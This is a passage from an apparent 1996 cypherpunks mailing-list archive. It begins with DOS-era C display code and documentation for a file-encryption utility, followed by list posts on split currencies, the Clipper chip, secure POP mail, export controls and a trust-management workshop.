      if (isp2 - ilow > 1) {                     /* low segment-width is > 1 */
         irdx++;                                 /* increment the sort radix */
         istk[irdx + irdx] = ilow + 1;            /* reset low array pointer */
         istk[irdx + irdx + 1] = isp2;            /* reset top array pointer */
      }
      if (itop - isp1 > 1) {                     /* top segment-width is > 1 */
         irdx++;                                 /* increment the sort radix */
         istk[irdx + irdx] = isp1;                /* reset low array pointer */
         istk[irdx + irdx + 1] = itop - 1;        /* reset top array pointer */
      }
   }
}

U io_vadr(I inop) {                      /* get video address (color or b/w) */
   rg.h.ah = 15;                                   /* video-address function */
   int86(0x10, &rg, &rg);                      /* call DOS for video address */
   if (rg.h.al == 7) {                                /* register A-low is 7 */
      return(0xb000);                                  /* return b/w address */
   } else {                                       /* register A-low is NOT 7 */
      return(0xb800);                                /* return color address */
   }
}

V io_vcls(I iclr) {                                 /* clear screen function */
   I irow;                             /* initialize the row number variable */
   C cdat[81];                             /* initialize the row data buffer */

   memset(cdat, ' ', 80);                       /* clear the row data buffer */
   cdat[80] = '\0';                         /* terminate the row data buffer */
   for (irow = 0; irow < 25; irow++) {          /* loop thru the screen rows */
      io_vdsp(cdat, irow, 0, iclr);       /* display each <blank> screen row */
   }
}

V io_vcsr(I irow, I icol, I icsr) {        /* set cursor position [and size] */
   rg.h.ah = 2;                                  /* cursor-position function */
   rg.h.bh = 0;                                           /* video page zero */
   rg.h.dh = (C)irow;                                          /* row number */
   rg.h.dl = (C)icol;                                       /* column number */
   int86(0x10, &rg, &rg);                     /* call DOS to position cursor */
   if (icsr) {                                      /* cursor-size specified */
      rg.h.ah = 1;                                   /* cursor-size function */
      rg.h.ch = (C)(13 - icsr);                     /* set cursor-begin line */
      rg.h.cl = 12;                                   /* set cursor-end line */
      int86(0x10, &rg, &rg);                  /* call DOS to set cursor size */
   }
}

V io_vdsp(C *cdat, I irow, I icol, I iclr) {       /* display data on screen */
   I ilen = strlen(cdat);                /* length of string to be displayed */
   I iptr;                              /* byte-counter for displayed string */
   U uclr = iclr * 256;                /* unsigned attribute high-byte value */

   if (!uvadr) {                            /* video pointer segment not set */
      FP_SEG(uvadr) = io_vadr(0);               /* set video pointer segment */
   }
   FP_OFF(uvadr) = irow * 160 + icol * 2;        /* set video pointer offset */
   for (iptr = 0; iptr < ilen; iptr ++) {      /* loop thru displayed string */
      *uvadr = uclr + (UC)cdat[iptr];            /* put data to video memory */
      uvadr++;                            /* increment video display pointer */
   }
}
*******************************************************************************
*******************************************************************************
*******************************************************************************
New  CCRP  documentation - changes as of 28.02.1996

----------Command----------    ------------------Output-------------------
CCRP                           Usage parameters.

CCRP  filename  /e             Encrypt each byte in 'filename' so that the
                               data cannot be seen, or, if the file was an
                               executable file, it cannot be executed.

CCRP  filename  /d             Decrypt (restore) each byte in 'filename'.

CCRP  filename  /e  key        Encrypt or decrypt 'filename', but add an
CCRP  filename  /d  key        additional factor (a key, or a password)
                               to the encryption and decryption.

                               NOTE 1: The key/password (if used) must be a
                                       contiguous string of characters with
                                       no blank spaces between any characters.
                               NOTE 2: If a key is entered for encryption, the
                                       same key must be entered for decryption.
                               NOTE 3: Encryption may be performed 2 or more
                                       times in sequence before decryption,
                                       using a different key each time, for
                                       additional encryption security.  In
                                       such case, the decryption steps must
                                       be performed in the reverse order
                                       (last encryption/first decryption).
                               NOTE 4: Encryption and decryption are mere
                                       complementary processes, so that if
                                       the decryption step were performed
                                       first, followed by encryption, the
                                       end effect would be the same.

      WARNING(!) Encryption changes the contents of a file, and if you cannot
                 perform the decryption process properly, including the use of
                 keys/passwords, you won't be able to recover the file at all.

                 Normally, before making changes to a file, you are advised
                 to make a backup copy of the file, but since the purpose of
                 encryption is to make the file unreadable and unusable, to
                 have a usable backup copy of the file on the same computer,
                 or even in the same area that the computer is located in,
                 wouldn't suit the primary purpose of encryption.

NOTES: If maximum security is the objective, you might want to encrypt a file
       several times (in several passes) with a different encryption key each
       pass, using different programs, and mixing the encryption/decryption
       order (OK as long as different keys are used).  Examples:

ENCRYPT.BAT (encrypt the file; see Note 4 above concerning the /d switch)
bcrp filename  /d  Little_Miss_Muffet_Sat_On_Her_Tuffet
ccrp filename  /e  The_Quick_Brown_Fox_Jumped_Over_The_Lazy_Dog
bcrp filename  /e  We_Have_Met_The_Enemy_And_They_Are_Us
ccrp filename  /d  Let_Him_That_Hath_Understanding_Count_The_Number_Of_The_Beast

DECRYPT.BAT (decrypt the file; see Note 4 above concerning the /e switch)
ccrp filename  /e  Let_Him_That_Hath_Understanding_Count_The_Number_Of_The_Beast
bcrp filename  /d  We_Have_Met_The_Enemy_And_They_Are_Us
ccrp filename  /d  The_Quick_Brown_Fox_Jumped_Over_The_Lazy_Dog
bcrp filename  /e  Little_Miss_Muffet_Sat_On_Her_Tuffet



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 1 Oct 1996 16:45:09 +0800
To: cypherpunks@toad.com
Subject: Re: the theory of split currency
In-Reply-To: <mDX3uD2w165w@bwalk.dm.com>
Message-ID: <3250B3DE.C5@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Dr.Dimitri Vulis KOTM wrote:
> "Perry E. Metzger" <perry@piermont.com> writes:
> > > Is there a name for a dual or split currency, in which
> > > there is one currency for domestic use and another, different
> > > appearing, currency for foreign usage?

> > I don't know of such a name, however...

> > > Does anyone know of any country which has had such a
> > > split currency?

> > ...this has been a common situation, in fact. South Africa, China, the
> > Soviet Union, and other unpleasant places have repeatedly done
> > this. Its usually a remarkably stupid idea.
> > Perry

> Several Western European countries had such split currencies after WW II.
> Belgium's two francs have almost been phased out. Spain is the only major
> country with two currencies (ESP and ESB). They actually fetch slightly
> different interest rates.
> Chile introduced 'unidad de fomento' a while back, and many other minor
> players do something similar.

Art Bell of late-night talk radio has been promoting the theory that the 
U.S. Govt. is going to do this soon.  Supposedly the U.S. taxpayers will 
prop up the external dollars, which get the best exchange rate.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Fiero" <rfiero@pophost.com>
Date: Tue, 1 Oct 1996 16:19:49 +0800
To: cypherpunks@toad.com
Subject: Re: Inflation-index bonds and private e-currency
Message-ID: <199610010607.AAA14373@smtp.pophost.com>
MIME-Version: 1.0
Content-Type: text/plain


E. Allen Smith wrote:
> 	One of the attractions of privately-produced currencies is as a
> hedge against inflation; this development may be a competitor to this
> idea. On the other hand, this setup does have an unavailability in _time_
> of the money (more so than other, equal-security bonds of the same duration),
> which may offset its greater spendability.
> 	-Allen

I don't get it. Why is this bond not saleable like any other? What 
"privately-produced currencies" are a hedge against inflation? If 
this bond is saleable like any other, why is the money unavailable? 
What means "greater spendability?" Is this assumed to be yet another 
government plot because it competes with other offerings and reduces 
the cost of borrowing?

Respectfully.
-- Richard Fiero --




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 1 Oct 1996 16:25:56 +0800
To: "Marc J. Wohler" <mwohler@ix.netcom.com>
Subject: Re: active practice in America
In-Reply-To: <199609301839.LAA05232@dfw-ix11.ix.netcom.com>
Message-ID: <3250B7E5.2627@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Marc J. Wohler wrote:
> At 08:45 AM 9/30/96 -0800, you wrote:
> >At 11:32 PM -0700 9/29/96, Dale Thorn wrote:
> >(Legal purists will point out that the second trial was for "Federal civil
> >rights violations." Harummphh. What would the Founders think of this logic:

> I am sure you know the reason for the 'civil rights violation laws.
> In the 50's & early 60's, all while jury's in the deep south refusing to
> convict obviously guilty white defendants of rape and  murder against blacks.
> What would be *your* remedy in such cases.

I'm glad you asked.  I wouldn't pretend to have *the* answer, but rather 
than screw around with basic Constitutional enumerations, I think the 
"authorities" should have had the guts to challenge those cases (at 
least the most obvious ones at first, to get the ball rolling), by 
investigating and declaring mistrials based on some kind of jury 
manipulation which showed bad faith on the part of the locals.

If they had the guts to do that, rather than cop out to people's 
*democratic* emotions (the easy way out), we'd be a lot better off.
BTW, this applies to a helluva lot of bad law, terrorist for one.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 1 Oct 1996 16:25:23 +0800
To: Stanton McCandlish <mech@eff.org>
Subject: Re: Another briefing in Atlanta on the NRC crypto report,... (fwd)
Message-ID: <199610010621.XAA13158@dfw-ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm still waiting for a briefing from Dorothy Denning, Dave Maher,
and the rest of the Clipper Chip review team on their findings
and a final report :-)  They released a preliminary report,
saying that SkipJack was strong, and never did release a final report
analyzing Clipper itself - the Clipper protocols, the chip itself, 
the master key loading system, or the master key handling procedures
(or if they did issue a final report, they didn't advertise it widely...)

                Bill Stewart

At 02:31 PM 9/30/96 -0700, Stanton McCandlish <mech@eff.org> forwarded:
>Date: Mon, 30 Sep 96 10:26:00 EST
>From: "CRYPTO" <crypto@nas.edu>
>Subject: Another briefing in Atlanta on the NRC crypto report,...
>
>Subject:
>Another briefing in Atlanta on the NRC crypto report, October 21, 1996
>  Cryptography's Role in Securing the Information Society
>  A Public Briefing in Atlanta, Georgia
>  Monday, October 21, 1996, 1:30-3:30 pm
>  
>There will be a public briefing in Atlanta, Georgia by the National
>Research Council on this report.  The briefing will be held at the
>Manufacturing Research Center on the campus of the Georgia Institute of
>Technology on Monday October 21, from 1:30 to 3:30.   Dr. Herbert Lin,
>director of the NRC study will conduct the briefing.  Questions from the
>audience will be entertained. For further information, please contact Dr.
>Myron L. Cramer (404) 894-7292, <myron.cramer@gtri.gatech.edu> at the
>Georgia Tech Research Institute.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: combee@sso-austin.sps.mot.com (Ben Combee)
Date: Tue, 1 Oct 1996 15:22:27 +0800
To: cypherpunks@toad.com
Subject: Secure POP Mail (was Mailmasher)
In-Reply-To: <v03007812ae75892bd1d9@[206.119.69.46]>
Message-ID: <9610010443.AA19348@sso-austin.sps.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Robert" == Robert Hettinga <rah@shipwright.com> writes:
    Robert> Take a look at:

    Robert> http://www.mailmasher.com/

    Robert> It's a way to get your mail through a web page. Pretty
    Robert> useful when you're at a braindead "cyber-cafe" machine and
    Robert> want to read your mail.  The problem is, mailmasher knows
    Robert> you POP password.

    Robert> Anyway to do this more securely?

Strick in SF (strick@yak.net) did a hack last year to put S/KEY into
yak.net's POP server.  If you had that setup on your account, you
could give Mailmasher the one time password, and it would be none the
wiser when you were finished.  Of course, it would still be able to
make copies of all the mail in your inbox folder plus it could field a
denial of service attack by keeping the connection open, but it
wouldn't be able to relogin.

Source might be on the Yak's web site... I'm not sure right now, I'm
just on a firewalled shell account, so I can't get to www.yak.net to
check.

-- 
Ben Combee, Software Developer (Will write assembly code for food)
Motorola > MIMS > MSPG > CTSD > Advanced ICs > Austin Design Center
E-mail: combee@sso-austin.sps.mot.com   Phone: (512) 891-7141




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 1 Oct 1996 16:57:01 +0800
To: Mail AutoResponder <abusebot@answerme.com>
Subject: Re: RESPONSE FROM CYBERPROMO
In-Reply-To: <199610010645.CAA09472@cyberpromo.com>
Message-ID: <3250BDCA.233B@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Mail AutoResponder wrote:
> Version 9-30-96:
> Cyber Promotions has started to implement stricter Terms of Service
> policies WITH TEETH.  We have just recently terminated several accounts for
> abuse of our policies.  (Updated TOS at end of message).

[buncha text deleted]

> If you would like to send a complaint about any account @cyberpromo.com or
> @answerme.com or @omni.cyberpromo.com  that has not been terminated, please
> send email to: wallace@cyberpromo.com

Ya' know, it's hard enough working 10 hours a day in a sweatshop, coming 
home to three kids and a cranky wife, the washer doesn't work, etc., and 
now I have to answer you?

Please, just leave me alone.  Don't send me anything.  No free money.  
Nothing.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 1 Oct 1996 16:46:35 +0800
To: John Young <jya@pipeline.com>
Subject: Re: ADJ_ust
In-Reply-To: <199609301350.NAA10824@pipe2.ny1.usa.pipeline.com>
Message-ID: <3250BFB9.5C18@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


John Young wrote:
>    9-30-96. NYP:
>    "National Security Experts Plan for Wars Whose Targets and
>    Weapons Are All Digital."
>       Is the threat real, or is this just another way to win
>       scarce funds?
>       Military and intelligence officials believe that enemy
>       nations, terrorists and criminal groups either already
>       have the capability to mount information warfare strikes
>       or soon will. Criminals are quickly progressing beyond
>       the vandalism and petty theft associated with teen-aged
>       hackers and into robbery and extortion schemes ranging
>       up to millions of dollars, corporate executives and
>       private investigators say.
>       Others reply that the worst threats mentioned are mostly
>       speculation. "Information warfare is a risk to our
>       nation's economy and defense," said Martin Libicki, a
>       senior fellow at the National Defense University. "But
>       I believe we will find ways to cope with these attacks,
>       adjust and shake them off, just as we do to natural
>       disasters like hurricanes."

If they wanna bombard the net, fine.  Just as long as they don't use one 
of those HAARP gizmos, like the ground-penetrating radar, and turn it 
onto a wide area, so everyone in, say, San Jose loses all their hard 
disk info and floppy backups.  I don't know much about non-magnetic 
technology, and so I wonder what the options are for secure backup, 
short of buying an expensive safe or a spot in an underground vault?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 1 Oct 1996 14:24:59 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: the theory of split currency
In-Reply-To: <199609301523.LAA15152@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.94.960930235229.19497A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 30 Sep 1996, Perry E. Metzger wrote:

> 
> > Is there a name for a dual or split currency, in which
> > there is one currency for domestic use and another, different
> > appearing, currency for foreign usage?
> 
> I don't know of such a name, however...

I have heard "Divided currency" "Distinct Currency" "Seperated Currency"
all of which suggest to me that there is no real name.

> 
> > Does anyone know of any country which has had such a
> > split currency?
> 
> ...this has been a common situation, in fact. South Africa, China, the
> Soviet Union, and other unpleasant places have repeatedly done
> this. Its usually a remarkably stupid idea.

Concur.  I'm not even sure proponents of the idea have any idea what it is
supposed to do or what it infact does.  It tends to be a cure-all type
measure for anything from money laundering prevention to capital
preservation.  In reality about all it does is make it harder to do
business with and in said economies.  It may be used, in the more
draconian states, to seperate treatment of those engaged in foreign
commerce from those not involved in international transactions (read rich
and poor).

> 
> Perry
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 3 Oct 1996 10:32:29 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: Bernstein hearing: The Press Release
In-Reply-To: <Pine.LNX.3.95.960922143515.533A-100000@gak>
Message-ID: <324643DA.2381@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Mark M. wrote:
> On Sun, 22 Sep 1996, Bill Stewart wrote:
> > The First Amendment does not contain the phrase "national security"
> > anywhere in it.  It does, however, begin with a rather explicit
> > "Congress shall make no law" which it applies to a bunch of things.
> > However, the body of the Constitution does say there should be a
> > Supreme Court, and the Supreme Court has (fairly reasonably) given 
> > itself
> > the job of deciding what's Constitutional and what's not.
> > The Supremes have, over the years, made a bunch of generally 
> > outrageous
> > decisions about what kinds of speech are protected by the First 
> > Amendment
> > and what kinds aren't, though their opinions have been gradually
> > improving since some of the really appalling ones earlier in the 
> > century.

> I did a little searching and couldn't find anything about a national
> security exception in the Consitution.  It's already a stretch to
> claim that disclosure of information vital to "nation security" is
> treason.  The Espionage Act, which is so obviously unconstitutional, 
> seems to make "harmful" speech illegal.

Although we're (allegedly) governed by the Constitution, the principles 
contained in the DOI have precedence.  With issues such as modern 
National Security (in a nuclear age, etc.), where certain aspects of the 
Constitution seem to get skirted or excepted for The Greater Good, you 
might want to include the DOI in your analysis.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: barrk@alias.cyberpass.net (Barry K.)
Date: Thu, 19 Sep 1996 14:22:58 -0700 (PDT)
To: cypherpunks-announce@toad.com
Subject: Re: Bernstein hearing reminder: [..]
Message-ID: <199609192042.NAA16104@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


Part 1 The Batman part
On Sep 19,  9:24am, Batman wrote:
> Subject: RE: Bernstein hearing reminder: THIS Friday 11:45AM, SF
Federal B
>For the 200th time, unsubscrive me of your fucked mail lists.
>
>-- End of excerpt from Batman


Part 2

James wrote:
>Apologies if you receive more than one copy of this message, but >I'm auto-replying to your message to handle the flood:

I had only one copy, James, but it was good.

>Redistribution to the list from which you originally received >the problem message is kindly requested.

Which list was that, James? 

>Thank you for bringing this matter to our attention. The email >or posting you have seen falsely represents Smith Barney and its
>employees. These are erroneous postings that did not originate >from anyone employed by our firm, and therefore we cannot >directly stop them from occurring. However we have advised the >companies we believe to have serviced the originator of these >messages and we are pursuing all possible steps to end this >fraud. Unfortunately some people abuse the Internet and we >regret any inconvenience they may have caused you.

Thats good, James. As the FBI man said: I smelled a rat and I
nipped it in the bud.

>There are currently no mailing lists maintained in the smb.com
>domain, so you were not subscribed to any list. If you receive >any further messages of this nature, they are the product of the >same spurious source.

Thats the word. Spuvious.


>We're sorry for any inconvenience you may have experienced as a
>result of this unfortunate abuse of the 'Net.

No inconvenience, James. No inconvenience, at all.

>Further queries via email to postmaster@smb.com please.

Direct your replies to:
cypherpunks-announce@toad.com
This list is a must for all people in the Arctic, the plains of Mongolia and the North West territories, who want to be kept "ajour" of the dressinghabits of the natives in California.

Barry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: flatline@direct.ca (Der Fuhrer of SS)
Date: Thu, 19 Sep 1996 16:04:58 -0700 (PDT)
To: cypherpunks-announce@toad.com
Subject: unsubscribe
Message-ID: <96Sep19.160455-0700pdt.30137-25649+333@orb.direct.ca>
MIME-Version: 1.0
Content-Type: text/plain


unsubscribe





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chang-Shing Perng <perng@cs.ucla.edu>
Date: Thu, 19 Sep 1996 16:53:55 -0700 (PDT)
To: "Barry K." <barrk@alias.cyberpass.net>
Subject: Unsubscribe
In-Reply-To: <199609192042.NAA16104@sirius.infonex.com>
Message-ID: <3241DBC5.4A86@cs.ucla.edu>
MIME-Version: 1.0
Content-Type: text/plain


UNSUBSCRIBE




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: barina man <westo@bssc.edu.au>
Date: Thu, 19 Sep 1996 16:51:41 -0700 (PDT)
To: cypherpunks-announce@toad.com
Subject: No Subject
Message-ID: <1.5.4.32.19960920135153.006855d0@172.24.10.10>
MIME-Version: 1.0
Content-Type: text/plain


unscribe 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Tue, 1 Oct 1996 17:14:04 +0800
To: cypherpunks@toad.com
Subject: Export laws don't just affect crypto
Message-ID: <Pine.3.89.9609302338.A10306-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain


The recent posts about GPS made me research the state of the art of GPS 
receivers. Seems they are getting pretty good. Two pounds, sub-meter 
accuracy, attitude determination, all at altitudes up to 60,000 feet and 
speeds up to 1,000 nmph. But what really caught my eye was the fine print 
at the bottom of the spec sheet:

"Higher altitude and velocities up to 25,000 nautical miles-per-hour 
options are available in the U.S."

I gather from this that as long as you are in the US, you are welcome to 
use this technology for applications that require larger than 1,000 nmph 
speeds.

Seems the software industry is not the only industry that's suffering 
from silly export control laws.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 1 Oct 1996 15:03:46 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: the theory of split currency
In-Reply-To: <v0300780fae75885ba0ff@[206.119.69.46]>
Message-ID: <Pine.SUN.3.94.960930235930.19497B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 30 Sep 1996, Robert Hettinga wrote:

> 
> Date: 	Sat, 28 Sep 1996 20:13:48 -0700 (PDT)
> From: Fred Foldvary <ffoldvar@jfku.jfku.edu>
> To: Austrian Economics <AustrianEcon@agoric.com>
> Subject: the theory of split currency
> Organization: JFK University
> Mime-Version: 1.0
> Sender: owner-austrianecon@agoric.com
> Precedence: bulk
> Reply-To: AustrianECON@agoric.com
> 
> Is there a name for a dual or split currency, in which
> there is one currency for domestic use and another, different
> appearing, currency for foreign usage?
> 
> Does anyone know of any country which has had such a
> split currency?
> 
> Is there any literature on such split currency?
> 
> Here some thoughts on how it could function in the U.S.:
> 1) Domestic currency would not be legal tender outside the U.S.

How, exactly, would this be enforced?

> 2) Foreign US dollars would not be legal tender in the U.S.
>    It would be illegal to hold foreign dollars in the U.S.
>    Travelers would be required to convert them at customs.

How, exactly, would this be enforced?

What would the above accomplish, other than to make travel more diffucult
and tourism complicated?  What about money orders in foreign
demoninations?  Would there be two American Express Travelers checks?
Foreign and domestic?

> 3) The export of domestic currency would be illegal.

It basically is now in the form of cash.  Certainly it is immensely
hassling.

> 4) All exchanges between domestic and foreign currency would
> be required to be made in official exchanges, with the amounts
> recorded and reported to the government.

Already the case for sums over $10,000 and in many cases for sums over
$7,500 as a matter of corporate policy.

> 5) All previous currency would be declared of no value after
> a certain date.  All conversions to new currency would be
> reported.

A painfully poor idea.  Just look to Russia's great ruble burnings for
proof of this.

> A motive for the government would be to control the underground
> economy, tax evasion, and the trade in illegal substances.

Currently the reason that it is popular to speculate that this would have
any effect on illegal substances, the underground economy, or tax evasion,
is because the war on drugs and money laundering is unwinable.  By
definition it must be easy for capital to flow back and forth between the
United States and other nations.  The more difficult this is made, the
more difficult legitimate commerce is to conduct, and, in addition, the
more difficult it becomes to make investments from abroad in the United
States.  It is the failure of Law Enforcement to have any noticable impact
on organized crime or drugs that made them strive to impose currency
restrictions in the place of legitimate law enforcement in the first
place.  It was the "soft underbelly" of crime and all that.  Unfortuantely
it is a hard underbelly to find, a hard one to identify when it is found,
and not alltogether very soft.  So now babblings about split currencies.
What a surprise.

I understand the concept, it becomes easier to track exportations of large
amounts of money in the form of cash.  Unfortunately any idiot could
circumvent it with the ease of taking sand from the beach.  Just because
the United States SAYS a $100 bill is worthless unless its in the U.S.,
certainly does not make it so.

As to circumvention: Form domestic corporation.  Purchase stocks, bonds,
other non-cash negotiable instruments.  Sell said instruments and demand
payment in DM or SFr etc.  Export foreign currency to the free economy
nation of choice.

All it does is move the laundering process onshore, and then only in the
first step.  Most money laundering uses non-cash exportation methods
already.  Diamonds are becomming more and more popular because of the
recent stability of uncut stone prices and the fungibility of diamonds as
a currency.  Luxembourg currently has the most potent diamond market in
the world.  Close to 45% of it is estimated to be operating as currency.
(Markets seeing the same stones over and over again).  Moreover, the cost
of exchanging stones in terms of middleman profit is often less than that
charged by large scale money laundering operations.

Those are the most basic of evasions.  I can come up with complicated
ones in seconds, and boggling ones in minutes.

In addition, as a solution, it fails to anticipate the foreign market for
domestic bills.  Surely I could exchange currencies with the casas de
cambios that will certainly be created to take advantage of the new
regulations about a week after they are inacted.

> 
> This scenario is not entirely hypothetical.  I have read that
> Senator Patrick Leahy introduced Senate Bill #307 to create
> such a split currency.  The Bill failed to pass the Senate,
> but this shows the concept is out there.
> 
> Is this worth investigation and theoretical examination?

It has born this kind of scrutiny before.  Time and Newsweek were onto the
story almost two years ago.  Considering that something like 3/4 of the
circulating supply of U.S. currency is abroad, you tell me how practical a
program this is.

> Fred Foldvary
> 
> --- end forwarded text
> 
> 
> 
> -----------------
> Robert Hettinga (rah@shipwright.com)
> e$, 44 Farquhar Street, Boston, MA 02131 USA
> "'Bart Bucks' are not legal tender."
>                 -- Punishment, 100 times on a chalkboard,
>                        for Bart Simpson
> The e$ Home Page: http://www.vmeng.com/rah/
> 
> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 1 Oct 1996 14:44:22 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Signs of Trouble in D.C.
Message-ID: <Pine.SUN.3.94.961001002354.20271A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain



Signs of unrest in the nation's capital.

These signs began to appear all over yesterday.

WARNING
THIS AREA HAS BEEN
DECLARED A DRUG FREE ZONE

Any person congregating in a group of 2 or more persons on 
public space within the boundaries of this drug free zone for 
the purpose of participating in the use, purchase of sale of 
illegal drugs, and who fails to disperse after being 
instructed to disperse by a uniformed member of the 
Metropolitan Police Department, is subject to arrest.  An 
arrest can result in a fine of not more than $300, 
Imprisonment for not more than 180 days or both.

Boundaries         _________________________

Dates and Times    _________________________

Larry D. Soulsby
Chief of Police
(Act 11-278, Anti-Loitering/Drug Free Zone Emergency Act of 1996)


--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 1 Oct 1996 16:05:43 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Signs of Trouble in D.C.
In-Reply-To: <Pine.3.89.9609302221.A10306-0100000@netcom9>
Message-ID: <Pine.SUN.3.94.961001020046.22606A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 30 Sep 1996, Lucky Green wrote:

> 
> 
> 
> On Tue, 1 Oct 1996, Black Unicorn wrote:
> 
> > 
> > Signs of unrest in the nation's capital.
> > 
> > These signs began to appear all over yesterday.
> > 
> > WARNING
> > THIS AREA HAS BEEN
> > DECLARED A DRUG FREE ZONE
> 
> Assuming you aren't joking, would somebody please please take a 
> photograph of such a sign and post it on the web?

I'm not joking and will send an actual sign to whoever gives me a snail
mail address to do so.  I have two in my possession.

> 
> --Lucky
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Tue, 1 Oct 1996 16:22:57 +0800
To: Steve Simmons <scs@lokkur.dexter.mi.us>
Subject: Re: Encrypted lists and ease of use
In-Reply-To: <199610010016.UAA17469@lokkur.dexter.mi.us>
Message-ID: <rogerg23zb1op.fsf@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> Steve Simmons <scs@lokkur.dexter.mi.us> writes:

  > Your solution is exactly what I want to do with the -encrypted
  > list...

Then grab Majordomo 1.93 from http://www.greatcircle.com/majordomo/,
PGPdomo 1.93 from ftp://ftp.jpunix.com/, and make whatever
modifications to the Perl code you need to support your dual-list
structure, instead of starting from scratch...

-- 
Roger Williams                         finger me for my PGP public key
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 1 Oct 1996 13:24:41 +0800
To: cypherpunks@toad.com
Subject: DIMACS Abstracts
Message-ID: <199610010301.DAA25739@pipe3.ny2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   We offer the ABSTRACTS of the presentations at: 
  
   DIMACS Workshop on Trust Management in Networks 
   September 30 - October 2, 1996 
   South Plainfield, NJ 
 
 
   http://jya.com/dimacs.txt  (80 kb) 
 
 
   ftp://jya.com/pub/incoming/dimacs.txt 
 
 
   Sorry, no E-mail. 
 
 
   Here are the titles and authors: 
 
   _________________________________________________________ 
 
   Let A Thousand (Ten Thousand?) CAs Reign 
 
   Stephen Kent, BBN Corporation 
 
   _________________________________________________________ 
 
   The PolicyMaker Approach to Trust Management 
 
   Matt Blaze, Joan Feigenbaum, and Jack Lacy, AT&T 
   Laboratories 
 
   _________________________________________________________ 
 
   SDSI -- A Simple Distributed Security Infrastructure 
 
   Butler Lampson and Ron Rivest, Microsoft and MIT 
 
   _________________________________________________________ 
 
   SPKI Certificates 
 
   Carl Ellison, Cybercash 
 
   _________________________________________________________ 
 
   Using PICS Labels for Trust Management 
 
   Rohit Khare 
 
   _________________________________________________________ 
 
   Managing Trust in an Information-Labeling System 
 
   M. Blaze (1), J. Feigenbaum (1), P. Resnick (1), M. 
   Strauss (2), 
   1. AT&T Laboratories 
   2. AT&T Laboratories and Iowa State University 
 
   _________________________________________________________ 
 
   Trust Management In Web Browsers, Present and Future 
 
   Drew Dean, Edward W. Felten, and Dan Wallach, Princeton 
   University 
 
   _________________________________________________________ 
 
   IBM Cryptolopes, SuperDistribution and Digital Rights 
   Management 
 
   Marc A. Kaplan, IBM 
 
   _________________________________________________________ 
 
   Requirements and Approaches for Electronic Licenses 
 
   David Maher, AT&T Laboratories 
 
   _________________________________________________________ 
 
   PathServer 
 
   Michael Reiter and Stuart Stubblebine, AT&T Laboratories 
 
   _________________________________________________________ 
 
   Inferno Security 
 
   David Presotto, Bell Labs, Lucent Technologies 
 
   _________________________________________________________ 
 
   Transparent Internet E-mail Security 
 
   Raph Levien, Lewis McCarthy, and Matt Blaze, AT&T 
   Laboratories 
 
   _________________________________________________________ 
 
